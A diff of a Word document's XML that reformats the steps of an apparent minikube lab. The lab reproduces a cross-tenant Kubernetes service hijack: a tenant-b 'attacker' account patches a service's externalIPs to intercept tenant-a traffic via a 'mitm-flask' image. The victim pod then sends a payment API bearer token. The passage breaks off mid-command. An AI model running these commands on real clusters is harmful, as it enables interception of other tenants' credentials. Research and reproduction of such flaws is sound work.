+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -9358,27 +8984,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>-a create secret generic payment-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-token \</w:t>
+        <w:t>-a create secret generic payment-api-token \</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9422,27 +9028,15 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> apply -f </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kubectl apply -f </w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -9453,7 +9047,6 @@
         </w:rPr>
         <w:t>victim.yaml</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
@@ -9477,25 +9070,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-a wait \</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-a wait \</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9543,6 +9125,7 @@
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -9551,6 +9134,7 @@
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -9617,17 +9201,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">docker build -t </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>mitm-</w:t>
+        <w:t>docker build -t mitm-</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -9639,7 +9213,6 @@
         </w:rPr>
         <w:t>flask:cve</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -9672,35 +9245,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>minikube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> image load </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>mitm-</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>minikube image load mitm-</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -9712,7 +9264,6 @@
         </w:rPr>
         <w:t>flask:cve</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
@@ -9778,27 +9329,15 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> apply -f </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kubectl apply -f </w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -9809,7 +9348,6 @@
         </w:rPr>
         <w:t>attacker.yaml</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -9840,7 +9378,6 @@
         </w:rPr>
         <w:t xml:space="preserve">  --as=</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -9871,7 +9408,6 @@
         </w:rPr>
         <w:t>b:attacker</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
@@ -9895,25 +9431,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b get pods -o wide</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b get pods -o wide</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9926,25 +9451,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b get svc -o wide</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b get svc -o wide</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9957,37 +9471,15 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b get endpoints hijack-external-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b get endpoints hijack-external-api</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10010,77 +9502,459 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>minikube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ssh -n minikube-m03 "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>crictl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ps</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>minikube ssh -n minikube-m03 "sudo crictl ps"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b get svc hijack-external-api -o wide</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b get endpoints hijack-external-api</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b patch service hijack-external-api \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  --type=merge \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  -</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>p '{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"spec</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>":{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"externalIPs</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>":[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"192.0.2.123</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"]}}</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>' \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  --as=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>system:serviceaccount</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:tenant-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b:attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exec victim -- \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  sh -c 'curl -sS -X POST \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    -H "Authorization: Bearer $SECRET_DATA_FROM_TENANT_A" \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    -H "Content-Type: application/json" \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    -</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>d "{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\"amount\":</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>100,\</w:t>
+      </w:r>
